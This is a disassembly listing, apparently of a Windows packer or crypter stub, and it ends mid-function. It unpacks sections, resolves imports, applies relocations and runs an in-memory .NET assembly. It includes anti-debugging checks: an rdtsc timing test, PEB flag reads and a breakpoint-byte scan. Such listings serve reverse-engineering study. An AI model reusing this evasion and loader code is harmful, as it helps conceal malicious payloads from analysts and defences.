; ---------------------------------------------------------------------------
loc_430B21: ; CODE XREF: start+E4�j
mov [ebp+var_28], 3
loc_430B28: ; CODE XREF: start+E6�j
mov eax, ds:off_430024
mov eax, [eax+14h]
add eax, [ebp+var_28]
mov ecx, ds:off_430024
mov [ecx+14h], eax
loc_430B3C: ; DATA XREF: start:loc_430B3C�o
mov [ebp+var_28], offset loc_430B3C
push 0Ah
mov eax, [ebp+var_28]
add eax, 10h
push eax
call sub_431401
pop ecx
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
imul eax, 8Ch
mov ecx, ds:off_430024
add ecx, eax
mov ds:off_430024, ecx
push 4
push 1000h
push 80h
push 0
call ds:dword_430238 ; VirtualAlloc
mov [ebp+var_24], eax
cmp [ebp+arg_4], 1
jz short loc_430B8E
and [ebp+arg_0], 0
loc_430B8E: ; CODE XREF: start+14F�j
push 4
push 1000h
push 104h
push 0
call ds:dword_430238 ; VirtualAlloc
mov [ebp+var_14], eax
push 104h
push [ebp+var_14]
push [ebp+arg_0]
call ds:dword_430250 ; GetModuleFileNameA
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
mov [ebp+var_58], eax
loc_430BC0: ; CODE XREF: start+199�j
mov eax, [ebp+var_58]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz short loc_430BD4
mov eax, [ebp+var_58]
dec eax
mov [ebp+var_58], eax
jmp short loc_430BC0
; ---------------------------------------------------------------------------
loc_430BD4: ; CODE XREF: start+190�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
sub eax, [ebp+var_14]
mov [ebp+var_54], eax
push 4
push 1000h
push 104h
push 0
call ds:dword_430238 ; VirtualAlloc
mov [ebp+var_4], eax
mov ecx, [ebp+var_54]
mov esi, [ebp+var_14]
mov edi, [ebp+var_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_4]
add eax, [ebp+var_54]
and byte ptr [eax+1], 0
mov eax, ds:dword_430020
shl eax, 6
mov ecx, ds:dword_430028
add ecx, eax
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, ds:dword_430028
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
add eax, 0F8h
mov [ebp+var_40], eax
mov eax, ds:off_430024
cmp dword ptr [eax+68h], 0
jz short loc_430CC7
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+80h]
mov ds:dword_431824, ecx
mov eax, ds:dword_431824
mov [ebp+var_3C], eax
mov eax, ds:off_430024
mov eax, [eax+8]
mov ds:dword_431828, eax
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+10h]
mov ds:off_431820, ecx
push ds:dword_431824
mov eax, ds:off_430024
push dword ptr [eax+4]
push ds:off_431820
call sub_430960
add esp, 0Ch
mov eax, ds:off_430024
push dword ptr [eax+6Ch]
push [ebp+var_3C]
call sub_431421
pop ecx
pop ecx
jmp loc_431307
; ---------------------------------------------------------------------------
loc_430CC7: ; CODE XREF: start+219�j
mov eax, ds:off_430024
cmp dword ptr [eax+64h], 0
jz loc_430DF1
push 4
push 1000h
mov eax, ds:off_430024
push dword ptr [eax+4]
push 0
call ds:dword_430238 ; VirtualAlloc
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov ds:dword_431824, eax
cmp ds:dword_431824, 0
jnz short loc_430D1B
push 30h
push [ebp+var_58]
push offset aErrorAllocatin ; "Error allocating memory!"
push 0
call ds:dword_430260 ; MessageBoxA
push 0
call ds:dword_43024C ; ExitProcess
loc_430D1B: ; CODE XREF: start+2C6�j
mov eax, ds:off_430024
mov eax, [eax+8]
mov ds:dword_431828, eax
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+10h]
mov eax, ds:off_430024
mov esi, [ebp+var_10]
mov eax, [eax+78h]
xor edx, edx
div dword ptr [esi+3Ch]
add ecx, edx
mov ds:off_431820, ecx
push ds:dword_431824
mov eax, ds:off_430024
push dword ptr [eax+4]
push ds:off_431820
call sub_430960
add esp, 0Ch
jmp short loc_430D73
; ---------------------------------------------------------------------------
loc_430D6C: ; CODE XREF: start+3A1�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_430D73: ; CODE XREF: start+331�j
mov eax, ds:off_430024
movzx eax, word ptr [eax+70h]
cmp [ebp+var_28], eax
jge short loc_430DDC
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
mov ecx, [ecx+eax+7Ch]
mov esi, ds:dword_431824
mov eax, [ebp+var_28]
imul eax, 18h
mov edx, ds:off_430024
mov edi, ds:dword_430028
add edi, [edx+eax+80h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
mov edx, ds:dword_431824
add edx, [ecx+eax+7Ch]
mov ds:dword_431824, edx
jmp short loc_430D6C
; ---------------------------------------------------------------------------
loc_430DDC: ; CODE XREF: start+346�j
push 8000h
push 0
push [ebp+var_3C]
call ds:dword_430234 ; VirtualFree
jmp loc_430EDB
; ---------------------------------------------------------------------------
loc_430DF1: ; CODE XREF: start+297�j
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+10h]
mov eax, ds:off_430024
sub ecx, [eax+0Ch]
mov eax, ds:off_430024
mov esi, [ebp+var_10]
mov eax, [eax+78h]
xor edx, edx
div dword ptr [esi+3Ch]
add ecx, edx
mov [ebp+var_3C], ecx
and [ebp+var_28], 0
jmp short loc_430E29
; ---------------------------------------------------------------------------
loc_430E22: ; CODE XREF: start:loc_430ED6�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_430E29: ; CODE XREF: start+3E7�j
mov eax, ds:off_430024
movzx eax, word ptr [eax+70h]
cmp [ebp+var_28], eax
jge loc_430EDB
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
cmp dword ptr [ecx+eax+74h], 0
jz loc_430ED6
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
cmp dword ptr [ecx+eax+7Ch], 0
jbe short loc_430ED6
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
mov edx, ds:dword_430028
add edx, [ecx+eax+80h]
mov ds:dword_431824, edx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
mov eax, [ecx+eax+7Ch]
mov ds:dword_431828, eax
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
mov edx, [ebp+var_3C]
add edx, [ecx+eax+78h]
mov ds:off_431820, edx
push ds:dword_431824
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, ds:off_430024
push dword ptr [ecx+eax+7Ch]
push ds:off_431820
call sub_430960
add esp, 0Ch
loc_430ED6: ; CODE XREF: start+413�j start+42A�j
jmp loc_430E22
; ---------------------------------------------------------------------------
loc_430EDB: ; CODE XREF: start+3B3�j start+3FC�j
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+24h]
mov [ebp+var_50], ecx
loc_430EEC: ; CODE XREF: start+6C4�j
mov eax, [ebp+var_50]
cmp dword ptr [eax+0Ch], 0
jz loc_431102
mov eax, ds:off_430024
cmp dword ptr [eax+24h], 0
jz loc_431102
lea eax, [ebp+var_48]
push eax
push 40h
push 14h
push [ebp+var_50]
call ds:dword_430248 ; VirtualProtect
mov eax, [ebp+var_50]
mov ecx, ds:dword_430028
add ecx, [eax+0Ch]
mov [ebp+var_C], ecx
push [ebp+var_C]
call ds:dword_430244 ; GetModuleHandleA
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jnz short loc_430F4A
push 8
push 0
push [ebp+var_C]
call ds:dword_430240 ; LoadLibraryExA
mov [ebp+var_30], eax
loc_430F4A: ; CODE XREF: start+4FF�j
cmp [ebp+var_30], 0
jnz short loc_430F88
mov edi, [ebp+var_C]
mov eax, [ebp+var_4]
add eax, [ebp+var_54]
mov edx, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 8
push 0
push [ebp+var_4]
call ds:dword_430240 ; LoadLibraryExA
mov [ebp+var_30], eax
loc_430F88: ; CODE XREF: start+515�j
cmp [ebp+var_30], 0
jnz short loc_430FBA
push [ebp+var_C]
push offset aARequired_dllF ; "A required .DLL file, %hs, was not foun"...
push [ebp+var_24]
call ds:dword_43025C ; wsprintfA
add esp, 0Ch
push 30h
push [ebp+var_58]
push [ebp+var_24]
push 0
call ds:dword_430260 ; MessageBoxA
push 0
call ds:dword_43024C ; ExitProcess
loc_430FBA: ; CODE XREF: start+553�j
mov eax, [ebp+var_50]
mov ecx, [ebp+var_30]
mov [eax+8], ecx
mov eax, [ebp+var_50]
mov dword ptr [eax+4], 0CDC31337h
mov eax, [ebp+var_50]
mov ecx, ds:dword_430028
add ecx, [eax+10h]
mov [ebp+var_20], ecx
mov eax, [ebp+var_50]
cmp dword ptr [eax], 0
jnz short loc_430FEC
mov eax, [ebp+var_20]
mov [ebp+var_18], eax
jmp short loc_430FFA
; ---------------------------------------------------------------------------
loc_430FEC: ; CODE XREF: start+5A9�j
mov eax, [ebp+var_50]
mov ecx, ds:dword_430028
add ecx, [eax]
mov [ebp+var_18], ecx
loc_430FFA: ; CODE XREF: start+5B1�j start+6B6�j
mov eax, [ebp+var_18]
cmp dword ptr [eax], 0
jz loc_4310F4
and [ebp+var_5C], 0
mov eax, [ebp+var_18]
mov eax, [eax]
and eax, 80000000h
test eax, eax
jz short loc_431034
mov eax, [ebp+var_18]
mov eax, [eax]
and eax, 0FFFFh
movzx eax, ax
push eax
push [ebp+var_30]
call ds:dword_43023C ; GetProcAddress
mov [ebp+var_5C], eax
jmp short loc_431054
; ---------------------------------------------------------------------------
loc_431034: ; CODE XREF: start+5DD�j
mov eax, [ebp+var_18]
mov eax, [eax]
add eax, ds:dword_430028
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
inc eax
inc eax
push eax
push [ebp+var_30]
call ds:dword_43023C ; GetProcAddress
mov [ebp+var_5C], eax
loc_431054: ; CODE XREF: start+5F9�j
cmp [ebp+var_5C], 0
jnz short loc_4310C4
mov eax, [ebp+var_18]
mov eax, [eax]
and eax, 80000000h
test eax, eax
jz short loc_43108F
mov eax, [ebp+var_18]
mov eax, [eax]
and eax, 0FFFFh
movzx eax, ax
push eax
push [ebp+var_C]
push [ebp+var_58]
push offset aTheHsFileIsLin ; "The %hs file is \nlinked to missing expo"...
push [ebp+var_24]
call ds:dword_43025C ; wsprintfA
add esp, 14h
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43108F: ; CODE XREF: start+62D�j
mov eax, [ebp+var_8]
inc eax
inc eax
push eax
push [ebp+var_C]
push [ebp+var_58]
push offset aTheHsFileIsL_0 ; "The %hs file is \nlinked to missing expo"...
push [ebp+var_24]
call ds:dword_43025C ; wsprintfA
add esp, 14h
loc_4310AC: ; CODE XREF: start+654�j
push 30h
push [ebp+var_58]
push [ebp+var_24]
push 0
call ds:dword_430260 ; MessageBoxA
push 0
call ds:dword_43024C ; ExitProcess
loc_4310C4: ; CODE XREF: start+61F�j
lea eax, [ebp+var_48]
push eax
push 40h
push 4
push [ebp+var_20]
call ds:dword_430248 ; VirtualProtect
mov eax, [ebp+var_20]
mov ecx, [ebp+var_5C]
mov [eax], ecx
mov eax, [ebp+var_18]
add eax, 4
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
add eax, 4
mov [ebp+var_20], eax
jmp loc_430FFA
; ---------------------------------------------------------------------------
loc_4310F4: ; CODE XREF: start+5C7�j
mov eax, [ebp+var_50]
add eax, 14h
mov [ebp+var_50], eax
jmp loc_430EEC
; ---------------------------------------------------------------------------
loc_431102: ; CODE XREF: start+4BA�j start+4C9�j
mov eax, ds:off_430024
mov eax, [eax+1Ch]
cmp eax, ds:dword_430028
jz loc_431279
mov eax, ds:off_430024
cmp dword ptr [eax+28h], 0
jz loc_431279
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+28h]
mov [ebp+var_34], ecx
loc_431136: ; CODE XREF: start+83B�j
mov eax, [ebp+var_34]
cmp dword ptr [eax], 0
jz loc_431279
mov eax, [ebp+var_34]
add eax, 8
mov [ebp+var_4C], eax
and [ebp+var_28], 0
jmp short loc_431158
; ---------------------------------------------------------------------------
loc_431151: ; CODE XREF: start+82A�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_431158: ; CODE XREF: start+716�j
mov eax, [ebp+var_34]
mov eax, [eax+4]
sub eax, 8
cdq
sub eax, edx
sar eax, 1
cmp [ebp+var_28], eax
jge loc_431268
mov eax, [ebp+var_34]
mov eax, [eax]
add eax, ds:dword_430028
mov ecx, [ebp+var_4C]
movzx ecx, word ptr [ecx]
and ecx, 0FFFh
add eax, ecx
mov [ebp+var_1C], eax
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jz short loc_4311A8
cmp [ebp+var_60], 3
jz short loc_4311AD
jmp loc_43122E
; ---------------------------------------------------------------------------
loc_4311A8: ; CODE XREF: start+762�j
jmp loc_43125B
; ---------------------------------------------------------------------------
loc_4311AD: ; CODE XREF: start+768�j
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [ebp+var_48], eax
mov eax, ds:off_430024
mov ecx, [ebp+var_48]
sub ecx, [eax+1Ch]
add ecx, ds:dword_430028
mov [ebp+var_48], ecx
mov eax, [ebp+var_48]
cmp eax, ds:dword_430028
jb short loc_4311E5
mov eax, [ebp+var_10]
mov ecx, ds:dword_430028
add ecx, [eax+50h]
cmp [ebp+var_48], ecx
jbe short loc_431213
loc_4311E5: ; CODE XREF: start+799�j
mov eax, [ebp+var_1C]
push dword ptr [eax]
push offset aErrorBadReloca ; "Error bad relocation pointer: *pdw = 0x"...
push [ebp+var_24]
call ds:dword_43025C ; wsprintfA
add esp, 0Ch
push 0
push [ebp+var_58]
push [ebp+var_24]
push 0
call ds:dword_430260 ; MessageBoxA
push 0
call ds:dword_43024C ; ExitProcess
loc_431213: ; CODE XREF: start+7AA�j
lea eax, [ebp+var_2C]
push eax
push 40h
push 4
push [ebp+var_1C]
call ds:dword_430248 ; VirtualProtect
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_48]
mov [eax], ecx
jmp short loc_43125B
; ---------------------------------------------------------------------------
loc_43122E: ; CODE XREF: start+76A�j
mov eax, [ebp+var_1C]
push dword ptr [eax]
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax]
push eax
push offset aUnexpectedRelo ; "Unexpected relocation type: *pw = 0x%04"...
push [ebp+var_24]
call ds:dword_43025C ; wsprintfA
add esp, 10h
push 0
push [ebp+var_58]
push [ebp+var_24]
push 0
call ds:dword_430260 ; MessageBoxA
loc_43125B: ; CODE XREF: start:loc_4311A8�j
; start+7F3�j
mov eax, [ebp+var_4C]
inc eax
inc eax
mov [ebp+var_4C], eax
jmp loc_431151
; ---------------------------------------------------------------------------
loc_431268: ; CODE XREF: start+730�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_34]
add ecx, [eax+4]
mov [ebp+var_34], ecx
jmp loc_431136
; ---------------------------------------------------------------------------
loc_431279: ; CODE XREF: start+6D7�j start+6E6�j ...
mov eax, ds:off_430024
cmp dword ptr [eax+30h], 0
jz short loc_431289
call sub_431372
loc_431289: ; CODE XREF: start+849�j
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+14h]
mov [ebp+var_38], ecx
pop large dword ptr fs:0
add esp, 4
loc_4312A4: ; CODE XREF: start+58�j
; start:loc_431307�j
push 8000h
push 0
push [ebp+var_24]
call ds:dword_430234 ; VirtualFree
push 8000h
push 0
push [ebp+var_4]
call ds:dword_430234 ; VirtualFree
push 8000h
push 0
push [ebp+var_14]
call ds:dword_430234 ; VirtualFree
mov eax, ds:off_430024
cmp dword ptr [eax+68h], 0
jz short loc_4312E7
push 0
call ds:dword_43024C ; ExitProcess
loc_4312E7: ; CODE XREF: start+8A4�j
mov eax, [ebp+var_38]
pop edi
pop esi
pop ebx
add esp, 60h
pop ebp
push eax
mov eax, ds:off_430024
cmp dword ptr [eax+14h], 0
jnz short loc_431302
pop eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_431302: ; CODE XREF: start+8C2�j
pop eax
jmp eax
; ---------------------------------------------------------------------------
jmp short loc_431309
; ---------------------------------------------------------------------------
loc_431307: ; CODE XREF: start+289�j
jmp short loc_4312A4
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_431309: ; CODE XREF: start+8CC�j
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR start
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public TlsCallback_0
TlsCallback_0 proc near ; CODE XREF: sub_431372+25�p
; DATA XREF: .ex_cod:TlsCallbacks�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
call sub_43139D
push 1
test eax, eax
pop ecx
jz short loc_431323
mov ds:dword_430020, ecx
loc_431323: ; CODE XREF: TlsCallback_0+D�j
cmp ds:dword_43000C, 0
push esi
jz short loc_43134F
mov eax, ds:off_430024
mov esi, [eax+40h]
test esi, esi
jz short loc_43136D
loc_431339: ; CODE XREF: TlsCallback_0+3F�j
mov eax, [esi]
test eax, eax
jz short loc_43136D
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
add esi, 4
jmp short loc_431339
; ---------------------------------------------------------------------------
loc_43134F: ; CODE XREF: TlsCallback_0+1D�j
mov eax, [ebp+arg_0]
mov ds:dword_430010, ecx
mov ds:dword_430014, eax
mov eax, [ebp+arg_4]
mov ds:dword_430018, eax
mov eax, [ebp+arg_8]
mov ds:dword_43001C, eax
loc_43136D: ; CODE XREF: TlsCallback_0+29�j
; TlsCallback_0+2F�j
pop esi
pop ebp
retn 0Ch
TlsCallback_0 endp
; =============== S U B R O U T I N E =======================================
sub_431372 proc near ; CODE XREF: start+84B�p
cmp ds:dword_430010, 0
mov ds:dword_43000C, 1
jz short locret_43139C
push ds:dword_43001C
push ds:dword_430018
push ds:dword_430014
call TlsCallback_0
locret_43139C: ; CODE XREF: sub_431372+11�j
retn
sub_431372 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43139D proc near ; CODE XREF: start+A1�p
; TlsCallback_0+3�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push eax
push ecx
mov eax, large fs:18h
mov eax, [eax+30h]
mov ecx, [eax]
mov [ebp+var_4], ecx
pop ecx
pop eax
rdtsc
xor ecx, ecx
add ecx, eax
rdtsc
sub eax, ecx
cmp eax, 0FFFh
jb short loc_4313CE
push 0
call near ptr dword_43024C
loc_4313CE: ; CODE XREF: sub_43139D+28�j
mov eax, [ebp+var_4]
and eax, 10000h
neg eax
sbb eax, eax
neg eax
pop edi
pop esi
pop ebx
leave
retn
sub_43139D endp
; =============== S U B R O U T I N E =======================================
sub_4313E1 proc near ; DATA XREF: start+67�o
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
add eax, 0B8h
mov ecx, [eax]
cmp ds:dword_430030, ecx
jnz short loc_4313FE
inc ecx
mov [eax], ecx
and ds:dword_430030, 0
loc_4313FE: ; CODE XREF: sub_4313E1+11�j
xor eax, eax
retn
sub_4313E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431401 proc near ; CODE XREF: start+86�p start+113�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov al, 0CCh
repne scasb
test ecx, ecx
jz short loc_43141A
push 1
pop eax
jmp short loc_43141C
; ---------------------------------------------------------------------------
loc_43141A: ; CODE XREF: sub_431401+12�j
xor eax, eax
loc_43141C: ; CODE XREF: sub_431401+17�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_431401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431421 proc near ; CODE XREF: start+282�p
var_48 = byte ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
mov edi, ds:dword_430254
xor ebx, ebx
push offset aOle32_dll ; "ole32.dll"
mov [ebp+var_14], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call edi ; LoadLibraryA
mov esi, ds:dword_43023C
push offset aCoinitialize ; "CoInitialize"
push eax
mov [ebp+var_38], eax
call esi ; GetProcAddress
push offset aCouninitialize ; "CoUninitialize"
mov [ebp+var_18], eax
push [ebp+var_38]
call esi ; GetProcAddress
push offset aMscoree_dll ; "mscoree.dll"
mov [ebp+var_38], eax
call edi ; LoadLibraryA
push offset aCorbindtorunti ; "CorBindToRuntimeEx"
push eax
call esi ; GetProcAddress
push offset aOleaut32_dll ; "oleaut32.dll"
mov [ebp+var_1C], eax
call edi ; LoadLibraryA
mov edi, eax
push 19Bh
push edi
call esi ; GetProcAddress
push 17h
push edi
mov [ebp+var_20], eax
call esi ; GetProcAddress
push 18h
push edi
mov [ebp+var_24], eax
call esi ; GetProcAddress
push 8
push edi
mov [ebp+var_2C], eax
call esi ; GetProcAddress
push 10h
push edi
mov [ebp+var_30], eax
call esi ; GetProcAddress
cmp [ebp+var_18], ebx
mov [ebp+var_34], eax
jz loc_43164F
cmp [ebp+var_38], ebx
jz loc_43164F
cmp [ebp+var_1C], ebx
jz loc_43164F
cmp [ebp+var_20], ebx
jz loc_43164F
cmp [ebp+var_24], ebx
jz loc_43164F
cmp [ebp+var_2C], ebx
jz loc_43164F
cmp [ebp+var_30], ebx
jz loc_43164F
cmp eax, ebx
jz loc_43164F
push ebx
call [ebp+var_18]
test eax, eax
jl loc_43164F
lea eax, [ebp+var_4]
push eax
push offset loc_430338
push (offset loc_430345+3)
push 2
push offset aWks ; "wks"
push ebx
call [ebp+var_1C]
test eax, eax
jl loc_43164F
mov eax, [ebp+var_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+28h]
test eax, eax
jl loc_43164F
mov eax, [ebp+var_4]
lea edx, [ebp+var_8]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+34h]
test eax, eax
mov eax, [ebp+var_8]
jl loc_431652
mov ecx, [eax]
lea edx, [ebp+var_14]
push edx
push offset dword_430150
push eax
call dword ptr [ecx]
test eax, eax
jl loc_43164F
push [ebp+arg_4]
push ebx
push 11h
call [ebp+var_20]
cmp eax, ebx
mov [ebp+var_18], eax
jz loc_43164F
lea ecx, [ebp+var_28]
mov [ebp+var_28], ebx
push ecx
push eax
call [ebp+var_24]
test eax, eax
jge short loc_4315A8
mov eax, [ebp+var_8]
cmp eax, ebx
jz short loc_431592
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431592: ; CODE XREF: sub_431421+169�j
mov eax, [ebp+var_4]
cmp eax, ebx
jz loc_431635
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_431635
; ---------------------------------------------------------------------------
loc_4315A8: ; CODE XREF: sub_431421+162�j
mov ecx, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov edi, [ebp+var_28]
mov eax, ecx
shr ecx, 2
rep movsd
push [ebp+var_18]
mov ecx, eax
and ecx, 3
rep movsb
call [ebp+var_2C]
mov eax, [ebp+var_14]
lea edx, [ebp+var_10]
push edx
push [ebp+var_18]
mov ecx, [eax]
push eax
call dword ptr [ecx+0B4h]
test eax, eax
jl short loc_431620
mov eax, [ebp+var_10]
lea edx, [ebp+var_C]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+40h]
test eax, eax
jl short loc_431620
lea eax, [ebp+var_48]
push eax
call [ebp+var_30]
push ebx
push ebx
sub esp, 10h
lea esi, [ebp+var_48]
mov edi, esp
mov eax, [ebp+var_C]
movsd
mov ecx, [eax]
push eax
movsd
movsd
movsd
call dword ptr [ecx+94h]
mov eax, [ebp+var_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+2Ch]
push [ebp+var_18]
call [ebp+var_34]
call [ebp+var_38]
loc_431620: ; CODE XREF: sub_431421+1B9�j
; sub_431421+1CA�j
mov eax, [ebp+var_8]
cmp eax, ebx
jz short loc_43162D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_43162D: ; CODE XREF: sub_431421+204�j
lea ecx, [ebp+var_4]
call sub_431695
loc_431635: ; CODE XREF: sub_431421+176�j
; sub_431421+182�j
lea ecx, [ebp+var_C]
call sub_431695
lea ecx, [ebp+var_10]
call sub_431695
lea ecx, [ebp+var_14]
call sub_431695
jmp short loc_431690
; ---------------------------------------------------------------------------
loc_43164F: ; CODE XREF: sub_431421+91�j
; sub_431421+9A�j ...
mov eax, [ebp+var_8]
loc_431652: ; CODE XREF: sub_431421+125�j
cmp eax, ebx
jz short loc_43165C
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_43165C: ; CODE XREF: sub_431421+233�j
mov eax, [ebp+var_4]
cmp eax, ebx
jz short loc_431669
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431669: ; CODE XREF: sub_431421+240�j
mov eax, [ebp+var_C]
cmp eax, ebx
jz short loc_431676
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431676: ; CODE XREF: sub_431421+24D�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_431683
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431683: ; CODE XREF: sub_431421+25A�j
mov eax, [ebp+var_14]
cmp eax, ebx
jz short loc_431690
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431690: ; CODE XREF: sub_431421+22C�j
; sub_431421+267�j
pop edi
pop esi
pop ebx
leave
retn
sub_431421 endp
; =============== S U B R O U T I N E =======================================
sub_431695 proc near ; CODE XREF: sub_431421+20F�p
; sub_431421+217�p ...
mov eax, [ecx]
test eax, eax
jz short locret_4316A1
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_4316A1: ; CODE XREF: sub_431695+4�j
retn
sub_431695 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4316A2 proc near ; CODE XREF: sub_430960+CA�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 1
mov esi, [ebp+arg_C]
pop ecx
mov [ebp+var_2C], ecx
mov [ebp+var_28], ecx
mov [ebp+var_24], ecx
xor eax, eax
and [ebp+var_C], al
mov [ebp+var_1C], ecx
mov [ebp+var_B], cl
mov ecx, [ebp+arg_4]
add ecx, 0FFFFFFFBh
mov [ebp+var_20], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_A], 2
mov [ebp+var_9], 2
mov [ebp+var_8], 3
mov [ebp+var_7], 3
mov [ebp+var_6], 3
mov [ebp+var_5], 3
mov [ebp+var_4], ecx
loc_4316F2: ; CODE XREF: sub_4316A2+16F�j
mov edi, [ebp+arg_0]
mov cl, [eax+edi]
cmp cl, 0E8h
jz short loc_431708
cmp cl, 0E9h
jz short loc_431708
inc eax
jmp loc_43180E
; ---------------------------------------------------------------------------
loc_431708: ; CODE XREF: sub_4316A2+59�j
; sub_4316A2+5E�j
mov edx, [ebp+arg_10]
mov ebx, [ebp+arg_8]
mov ecx, eax
sub ecx, [edx]
add ecx, ebx
add ebx, eax
cmp ecx, 5
mov [edx], ebx
jbe short loc_431722
and dword ptr [esi], 0
jmp short loc_431732
; ---------------------------------------------------------------------------
loc_431722: ; CODE XREF: sub_4316A2+79�j
test ecx, ecx
jbe short loc_431732
loc_431726: ; CODE XREF: sub_4316A2+8E�j
mov edx, [esi]
and edx, 77h
shl edx, 1
dec ecx
mov [esi], edx
jnz short loc_431726
loc_431732: ; CODE XREF: sub_4316A2+7E�j
; sub_4316A2+82�j
mov dl, [eax+edi+4]
test dl, dl
jz short loc_431743
cmp dl, 0FFh
jnz loc_4317FA
loc_431743: ; CODE XREF: sub_4316A2+96�j
mov ecx, [esi]
mov [ebp+arg_4], ecx
shr [ebp+arg_4], 1
mov ebx, [ebp+arg_4]
and ebx, 7
cmp [ebp+ebx*4+var_2C], 0
jz loc_4317FA
